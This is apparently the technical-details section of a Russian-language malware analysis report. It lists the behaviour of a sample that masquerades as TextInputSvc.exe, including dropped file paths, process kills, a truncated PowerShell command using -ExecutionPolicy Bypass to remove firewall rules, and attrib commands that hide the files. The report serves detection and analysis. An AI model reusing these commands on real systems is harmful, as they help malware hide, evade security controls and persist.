Техническая информация
- '<SYSTEM32>\taskkill.exe' /F /IM TextInputSvc.exe /T
- Процесс ddpdcs.exe, модуль Amsi.dll
- Процесс ddpdcs.exe, модуль ntdll.dll
- nul
- %ALLUSERSPROFILE%\microsoft\textservicesframework\textinputsvc.exe
- %LOCALAPPDATA%\microsoft\windows\caches\textinputsvc.exe
- %ALLUSERSPROFILE%\microsoft\textservicesframework\textinputsvc.exe
- %LOCALAPPDATA%\microsoft\windows\caches\textinputsvc.exe
- ClassName: '' WindowName: ''
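- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command " # ========== УДАЛЯЕМ СТАРЫЕ ПРАВИЛА ========== Remove-NetFirewallRule -DisplayName \"TextInputSvc*\" -ErrorAction SilentlyContinue # ========== OU...
  (Командная строка в отчёте обрезана. В видимой части PowerShell запускается с параметром -ExecutionPolicy Bypass и удаляет правила брандмауэра Windows, отображаемое имя которых начинается с «TextInputSvc»; сообщения об ошибках подавляются параметром -ErrorAction SilentlyContinue.)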
- '<SYSTEM32>\cmd.exe' /C "taskkill /F /IM TextInputSvc.exe /T 2>nul"
- '<SYSTEM32>\cmd.exe' /C "wmic process where \"ExecutablePath='C:\\ProgramData\\Microsoft\\TextServicesFramework\\TextInputSvc.exe'\" delete 2>nul"
- '<SYSTEM32>\wbem\wmic.exe' process where \"ExecutablePath='C:\\ProgramData\\Microsoft\\TextServicesFramework\\TextInputSvc.exe'\" delete
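- '<SYSTEM32>\attrib.exe' +S +H %ALLUSERSPROFILE%\Microsoft\TextServicesFramework\TextInputSvc.exe
- '<SYSTEM32>\attrib.exe' +S +H %LOCALAPPDATA%\Microsoft\Windows\Caches\TextInputSvc.exe
  (attrib +S +H устанавливает для файлов атрибуты «системный» и «скрытый», поэтому при настройках по умолчанию они не отображаются в Проводнике; при проверке системы их можно увидеть командой dir /a.)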